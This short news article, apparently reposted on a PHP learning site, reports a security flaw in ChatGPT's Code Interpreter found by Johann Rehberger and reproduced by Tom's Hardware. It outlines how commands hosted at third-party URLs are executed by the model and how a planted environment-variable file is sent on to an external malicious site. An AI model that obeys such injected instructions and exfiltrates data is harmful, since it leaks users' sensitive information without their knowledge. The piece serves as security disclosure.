Security Risks of OpenAI's ChatGPT Code Interpreter Tool
OpenAI's new ChatGPT Code Interpreter, which can generate and run Python code in a sandbox, has been shown to allow malicious actors to exploit spreadsheet handling and command execution features, raising serious information‑security concerns among experts.
OpenAI recently launched a new Code Interpreter tool for ChatGPT, which can help programmers debug and improve code.
The tool can use AI to write Python code that can even run in a sandbox.
However, according to cybersecurity expert Johann Rehberger and reports from Tom's Hardware and other foreign media, because the interpreter can handle any spreadsheet file and present data as charts, hackers can trick ChatGPT into executing commands from third‑party URLs.
Currently only ChatGPT Plus subscribers can access the tool, but the vulnerability has raised concerns among security experts.
Tom's Hardware reproduced the issue by creating a fake environment‑variable file, feeding it to ChatGPT, and having the model send the data to an external malicious site.
ChatGPT can respond to Linux commands, access related information and files, allowing attackers to retrieve sensitive data without the user’s awareness.
php中文网 Courses
php中文网's platform for the latest courses and technical articles, helping PHP learners advance quickly.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.